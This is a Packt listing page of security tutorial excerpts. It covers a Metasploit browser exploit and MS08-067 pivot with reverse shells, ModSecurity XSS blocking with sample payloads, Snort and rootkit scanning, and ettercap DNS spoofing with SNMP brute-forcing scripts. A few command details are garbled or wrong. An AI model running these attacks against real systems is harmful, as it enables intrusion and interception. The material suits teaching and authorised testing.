Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 6420

article-image-blocking-common-attacks-using-modsecurity-25-part-2
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different than scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail on how to prevent attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and injection of arbitrary content into web pages. Cross-site scripting attacks can generally be divided into two categories: Reflected attacksThis kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute. Stored attacksIn this type of XSS attack, the attacker is able to include his malicious payload into data that is permanently stored on the server and will be included without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page. Preventing XSS attacks The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >) with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages: Character HTML-encoded version < &lt; > &gt; ( &#40; ) &#41; # &#35; & &amp; " &quot; ' &#39; In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows: <a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a> This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them: Script fragment Regular expression <script <script eval( evals*( onMouseOver onmouseover onMouseOut onmouseout onMouseDown onmousedown onMouseMove onmousemove onClick onclick onDblClick ondblclick onFocus onfocus PDF XSS protection You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment. The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this: http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user, he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity: SecPdfProtect On SecPdfProtectMethod TokenRedirection SecPdfProtectSecret "SecretString" SecPdfProtectTimeout 10 SecPdfProtectTokenName "token" The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future). HttpOnly cookies to prevent XSS attacks One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers: Internet Explorer (IE6 SP1 and later) Firefox (2.0.0.5 and later) Google Chrome (all versions) Safari (3.0 and later) Opera (version 9.50 and later) HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via for example the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as for example session IDs. A cookie header with the HttpOnly flag set looks like this: Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly HttpOnly cookies need to be supported on the server-side for the clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call: <?php ini_set("session.cookie_httponly", 1); ?> Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so: <Context> <Manager useHttpOnly="true" /> </Context> In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now. Session identifiers Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages: Language Session identifier cookie name PHP PHPSESSID JSP JSESSIONID ASP ASPSESSIONID ASP.NET ASP.NET_SessionId The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server: echo -e "GET / HTTP/1.1nHost:yourserver.comnn"|nc yourserver.com 80|head Look for a line similar to: Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/ This is the session cookie—in this case the name of it is JESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies: # # Add HttpOnly flag to session cookies # SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass" SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_ cookie=%{MATCHED_VAR}" Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_ cookie We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
Read more
  • 0
  • 0
  • 6228
article-image-backtrack-forensics
Packt
28 Feb 2013
8 min read
Save for later

BackTrack Forensics

Packt
28 Feb 2013
8 min read
(For more resources related to this topic, see here.) Intrusion detection and log analysis Intrusion detection is a method used to monitor malicious activity on a computer network or system. It's generally referred to as an intrusion detection system (IDS) because it's the system that actually performs the task of monitoring activity based upon a set of predefined rules. An IDS adds an additional layer of security to a network by analyzing information from various points and determining if an actual or possible security breach has occurred, or to locate if a vulnerability is present that will allow for a possible breach. In this recipe, we will examine the Snort tool for the purposes of intrusion detection and log analysis. Snort was developed by Sourcefire, and is an open source tool that has the capabilities of acting as both an intrusion detection system and an intrusion prevention system. One of the advantages of Snort is that it allows you to analyze network traffic in real time, and make faster responses should security breaches occur. Remember, running Snort on our network and utilizing it for intrusion detection does not stop exploits from occurring. It just gives us the ability to see what is going on in our network. Getting ready A connection to the Internet or intranet is required to complete this task. It is assumed that you have visited http://snort.org/start/rules and downloaded the Sourcefire Vulnerability Research Team (VRT) Certified Rules. A valid ruleset must be maintained in order to use Snort for detection. If you do not have an account already, you may sign up at https://www.snort.org/signup. How to do it... Let's begin by starting Snort: Start the Snort service: Now that the Snort service has been initiated, we will start the application from a terminal window. We are going to pass a few options that are described as follows: -q: This option tells Snort to run in inline mode. -v: This command allows us to view a printout of TCP/IP headers on the screen. This is also called the "sniffer mode" setting. -c: This option allows us to select our configuration file. In this case, its location is /etc/snort/snort.conf. -i: This option allows you to specify your interface. Using these options, let's execute the following command: snort -q -v -i eth1 -c /etc/snort/snort.conf To stop Snort from monitoring, press Ctrl + X. How it works... In this recipe, we started the Snort service and launched Snort in order to view the log data. There's more… Before we can adequately use Snort for our purposes, we need to make alterations to its configuration file. Open a terminal window and locate the Snort configuration file: locate snort.conf Now we will edit the configuration file using nano: nano /etc/snort/snort.conf Look for the line that reads var HOME_NET any. We would like to change this to our internal network (the devices we would like to have monitored). Each situation is going to be unique. You may want to only monitor one device and you can do so simply by entering its IP address (var HOME_NET 192.168.10.10). You may also want to monitor an IP range (var HOME_NET 192.168.10.0/24), or you may want to specify multiple ranges (var HOME_NET 192.168.10.0/24,10.0.2.0/24). In our case, we will look at just our local network: var HOME_NET 192.168.10.0/24 Likewise, we need to specify what is considered the external network. For most purposes, we want any IP address that is not a part of our specified home network to be considered as external. So we will place a comment on the line that reads var EXTERNAL_NET any and uncomment the line that says var EXTERNAL_NET !$HOME_NET: #var EXTERNAL_NET any var External_NET !$HOME_NET The screenshot represents the two lines that you need to alter to match the changes mentioned in this step. To view an extended list of Snort commands, please visit the Snort Users Manual at http://www.snort.org/assets/166/ snort_manual.pdf. Recursive directory encryption/decryption Encryption is a method of transforming data into a format that cannot be read by other users. Decryption is the method of transforming data back into a format that is readable. The benefit of encrypting your data is that even if the data is stolen, without the correct decryptor, it's unusable by the stealing party. You have the ability, depending on the program that you use, to encrypt individual files, folders, or entire hard drives. In this recipe, we will use gpgdir to perform recursive directory encryption and decryption. An advantage of using gpgdir is that it has the ability to not only encrypt a folder, but also all subfolders and files contained within our main folder. This will save you a lot of time and effort! Getting ready To complete this recipe, you must have gpgdir installed on your BackTrack version. How to do it... In order to use gpgdir, you must have it installed. If you have not installed it before, use the following instructions to install it: Open a terminal window and make a new directory under the root filesystem: mkdir /sourcecode Change your directory to the sourcecode directory: cd /sourcecode Next, we will use Wget to download the gpgdir application and its public key: wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2 Next we download the signature file: wget http://cipherdyne.org/gpgdir/download/gpgdir- 1.9.5.tar.bz2.asc Next we download the public key file: Now we need to verify the package: gpg --import public_key gpg --verify gpgdir-1.9.5.tar.bz2.asc Next we untar gpgdir, switch to its directory, and complete the installation: tar xfj gpgdir-1.9.5.tar.bz2 cd gpgdir-1.9.5 ./install.pl The first time you run gpgdir, a new file will be created in your root directory (assuming root is the user you are using under BackTrack). The file is called ./ gpgdirrc. To start the creation of the file, type the following command: gpgdir Finally, we need to edit the gpgdirrc file and remove the comments from the default_key variable: vi /root/.gpgdirrc Now that you have gpgdir installed, let's use it to perform recursive directory encryption and decryption: Open a terminal window and create a directory for us to encrypt: mkdir /encrypted_directory Add files to the directory. You can add as many files as you would like using the Linux copy command cp. Now, we will use gpgdir to encrypt the directory: gpgdir -e /encrypted_directory At the prompt, enter your password. This is the password associated with your key file. To decrypt the directory with gpgdir, type the following command: gpgdir -d /encrypted_directory How it works… In this recipe, we used gpgdir to recursively encrypt a directory and to subsequently decrypt it. We began the recipe by installing gpgdir and editing its configuration file. Once gpgdir has been installed, we have the ability to encrypt and decrypt directories. For more information on gpgdir, please visit its documentation website at http://cipherdyne.org/gpgdir/docs/. Scanning for signs of rootkits A rootkit is a malicious program designed to hide suspicious processes from detection and allow continued, often remote, access to a computer system. Rootkits can be installed using various methods including hiding executable code within web page links, downloaded software programs, or on media files and documents. In this recipe, we will utilize chkrootkit to search for rootkits on our Windows or Linux system. Getting ready In order to scan for a rootkit, you can either use your BackTrack installation, log in to a compromised virtual machine remotely, or mount the BackTrack 5 R3 DVD on a computer system to which you have physical access. How to do it... Let's begin exploring chkrootkit by navigating to it from the BackTrack menu: Navigate to Applications | BackTrack | Forensics | Anti-Virus Forensics Tools | chkrootkit: Alternatively, you can enter the following commands to run chkrootkit: cd /pentest/forensics/chkrootkit ./chkrootkit chkrootkit will begin execution immediately, and you will be provided with an output on your screen as the checks are processed: How it works… In this recipe, we used chkrootkit to check for malware, Trojans, and rootkits on our localhost. chkrookit is a very effective scanner that can be used to determine if our system has been attacked. It's also useful when BackTrack is loaded as a live DVD and used to scan a computer you think is infected by rootkits. There's more... Alternatively, you can run Rootkit Hunter (rkhunter) to find rootkits on your system: Open a terminal window and run the following command to launch rkhunter: rkhunter --check At the end of the process, you will receive a summary listing the checks performed and their statistics: Useful alternative command options for chkrootkit The following is a list of useful commands to select when running chkrootkit: -h: Displays the help file -V: Displays the current running version of chkrootkit -l: Displays a list of available tests Useful alternative command options for rkhunter The following is a list of useful commands to select when running rkhunter: --update: Allows you to update the rkhunter database rkhunter --update --list: Displays a list of Perl modules, rootkits available for checking, and tests that will be performed rkhunter --list --sk: Allows you to skip pressing the Enter key after each test runs rkhunter --check --sk Entering rkhunter at a terminal window will display the help file: rkhunter
Read more
  • 0
  • 0
  • 5853

article-image-network-exploitation-and-monitoring
Packt
22 May 2014
8 min read
Save for later

Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
(For more resources related to this topic, see here.) Man-in-the-middle attacks Using ARP abuse, we can actually perform more elaborate man-in-the-middle (MITM)-style attacks building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that. MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit, being communicated between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today! Ettercap DNS spoofing Ettercap is a tool that facilitates a simple command line and graphical interface to perform MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps: Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS name and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification: ettercap [OPTIONS] [TARGET1] [TARGET2] To perform a MITM attack using ettercap, you need to supply the –M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like: ettercap –M arp:remote –P dns_spoof [TARGET1] [TARGET2] Where TARGET1 and TARGET2 is the host you want to intercept and either the default gateway or DNS server, interchangeably. To target the host at address 192.168.10.106 with a default gateway of 192.168.10.1, you will invoke the following command: ettercap –M arp:remote –P dns_spoof /192.168.10.107//192.168.10.1/ Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listen for any DNS requests to the domains it's configured to resolve. Interrogating servers For any network device to participate in communication, certain information needs to be accessible to it, no device will be able to look up a domain name or find an IP address without the participation of devices in charge of certain information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it. SNMP interrogation The Simple Network Management Protocol (SNMP) is used by routers and other network components in order to support remote monitoring of things such as bandwidth, CPU/Memory usage, hard disk space usage, logged on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to proliferate any potentially useful information from it. About SNMP Security SNMP services before Version 3 are not designed with security in mind. Authentication to these services often comes in the form a simple string of characters called a community string. Another common implementation flaw that is inherent to SNMP Version 1 and 2 is the ability to brute-force and eavesdrop on communication. To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by using the following command: snmpwalk –v [1 | 2c | 3 ] –c [community string] [target host] For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service: snmpwalk –v 1 –c public 192.168.10.103 Here, we opted to use SNMP Version 1, hence the –v 1 in the invocation for the preceding command. The output will look something like the following screenshot: As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database. Exploiting SNMP successfully is often strongly depended on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to its host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it. Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script pretty much does exactly what snmpwalk does except it structures the extracted information in a friendlier format. This makes it easier to understand. Here's an example: msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE] The options available for this module are shown in the following screenshot: Here's an example invocation against the host in our running example: msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103 The preceding command produces the following output: You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter. In other situations, you may not always be lucky enough to preemptively know the community string being used. However, luckily SNMP Version 1, 2, 2c, and 3c do not inherently have any protection against brute-force attacks, nor do any of them use any form of network based encryption. In the case of SNMP Version 1 and 2c, you could use a nifty Metasploit module called snmp-login that will run through a list of possible community strings and determine the level of access the enumerated strings gives you. You can use it by running the following command: msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103 The preceding command produces the following output: As seen in the preceding screenshot, once the run is complete it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module on some of the password lists that ship with Kali Linux, as follows: msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/ rockyou.txt RHOSTS=192.168.10.103 This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script as shown in the following example: #!/bin/bash if [ $# != 1 ] then echo "USAGE: . snmp [HOST]" exit 1 fi TARGET=$1 echo "[*] Running SNMP enumeration on '$TARGET'" for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F' '/access with community/ { print $2 }'`; do echo "[*] found community string '$comm_string' ...running enumeration"; msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null; done The following command shows you how to use it: . snmp.sh [TAGRET] In our running example, it is used as follows: . snmp.sh 192.168.10.103 Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example: tcpdump udp port 161 –i eth0 –vvv –A The preceding command will produce the following output: Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to see the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux versions.
Read more
  • 0
  • 0
  • 5849
Modal Close icon
Modal Close icon